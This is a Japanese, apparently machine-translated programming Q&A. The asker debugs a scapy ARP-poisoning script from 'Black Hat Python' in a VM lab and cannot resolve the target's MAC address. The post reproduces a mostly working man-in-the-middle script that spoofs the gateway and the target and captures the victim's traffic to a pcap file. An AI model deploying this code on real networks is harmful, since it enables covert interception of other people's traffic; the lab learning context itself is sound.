2
ジャスティン・セイツ・ブラック・ハット・パイソンの第4章では、scapyを使ったARPポイズニングについて詳しく説明しています。ターゲットマシンのターゲットIPのMACアドレスを取得する際に問題が発生しています。私は攻撃マシンとしてKali VMを使用し、ターゲットマシンとしてWin 7 VMを使用しています。ARPポイズニングwith scapy:ターゲットMACを取得できません。
from scapy.all import *
import os
import sys
import threading
import signal
interface = "eth0"
target_ip = "10.0.2.15"
gateway_ip = "10.0.2.2"
packet_count = 1000
def restore_target(gateway_ip, gateway_mac, target_ip, target_mac):
print "[*} Restoring target..."
send(ARP(op=2, psrc=gateway_ip, pdst=target_ip,
hwdst="ff:ff:ff:ff:ff:ff", hwsrc=gateway_mac), count=5)
send(Arp(op=2, psrc=target_ip, pdst=gateway_ip,
hwdst="ff:ff:ff:ff:ff:ff", hwsrc=target_mac), count=5)
os.kill(os.getpid(), signal.SIGINT)
def get_mac(ip_address):
responses, unanswered = srp(
Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst=ip_address), timeout=2, retry=10)
for s, r in responses:
return r[Ether].src
return None
def poison_target(gateway_ip, gateway_mac, target_ip, target_mac):
poison_target = ARP()
poison_target.op = 2
poison_target.psrc = gateway_ip
poison_target.pdst = target_ip
posion_target.hwdst = target_mac
poison_gateway = ARP()
poison_gateway.op = 2
poison_gateway.psrc = target_ip
poison_gateway.pdst = gateway_ip
poison_gateway.hwdst = gateway_mac
print "[*] Beginning the ARP poison. [CTRL-C to stop]"
while True:
try:
send(poison_target)
send(poison_gateway)
time.sleep(2)
except KeyboardInterrupt:
restore_target(gateway_ip, gateway_mac, target_ip, target_mac)
print "[*] ARP poison attack finished."
return
conf.iface = interface
conf.iface = interface
conf.verb = 0
print "[*] Setting up %s" % interface
gateway_mac = get_mac(gateway_ip)
if gateway_mac is None:
print "[!!!] Failed to get gateway MAC. Exiting."
sys.exit(0)
else:
print "[*] Gateway %s is at %s" % (gateway_ip, gateway_mac)
target_mac = get_mac(target_ip)
if target_mac is None:
print "[!!!] Failed to get target MAC. Exiting."
sys.exit(0)
else:
print "[*] Target %s is at %s" % (target_ip, target_mac)
poison_thread = threading.Thread(target=posion_target, args=(
gateway_ip, gateway_mac, target_ip, target_mac))
poison_thread.start()
try:
print "[*] Starting sniffer for %d packets" % packet_count
bpf_filter = "ip host %s" % target_ip
packets = sniff(count=packet_count, filter=bpf_filter, iface=interface)
wrpcap('arper.pcap', packets)
restore_target(gateway_ip, gateway_mac, target_ip, target_mac)
except KeyboardInterrupt:
restore_target(gateway_ip, gateway_mac, target_ip, target_mac)
sys.exit(0)
攻撃機:
[email protected]:~/Documents# ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 10.0.2.15 netmask 255.255.255.0 broadcast 10.0.2.255
inet6 fe80::a00:27ff:fe81:b1df prefixlen 64 scopeid 0x20<link>
ether 08:00:27:81:b1:df txqueuelen 1000 (Ethernet)
RX packets 101529 bytes 101906744 (97.1 MiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 34775 bytes 3530239 (3.3 MiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 218 bytes 13972 (13.6 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 218 bytes 13972 (13.6 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
出力:
[email protected]:~/Documents# sudo python arper.py
[*] Setting up eth0
[*] Gateway 10.0.2.2 is at 52:54:00:12:35:02
[!!!] Failed to get target MAC. Exiting.
ターゲットにpingを実行できますか? – coder
はい、--- 10.0.2.15 ping統計--- 21パケットが送信され、21が受信され、0パケット損失、時間20468ms rtt min/avg/max/mdev = 0.034/0.057/0.222/0.037 ms – Levia
+1実際にプログラミング関連のKaliとARPの質問をしています。 – jww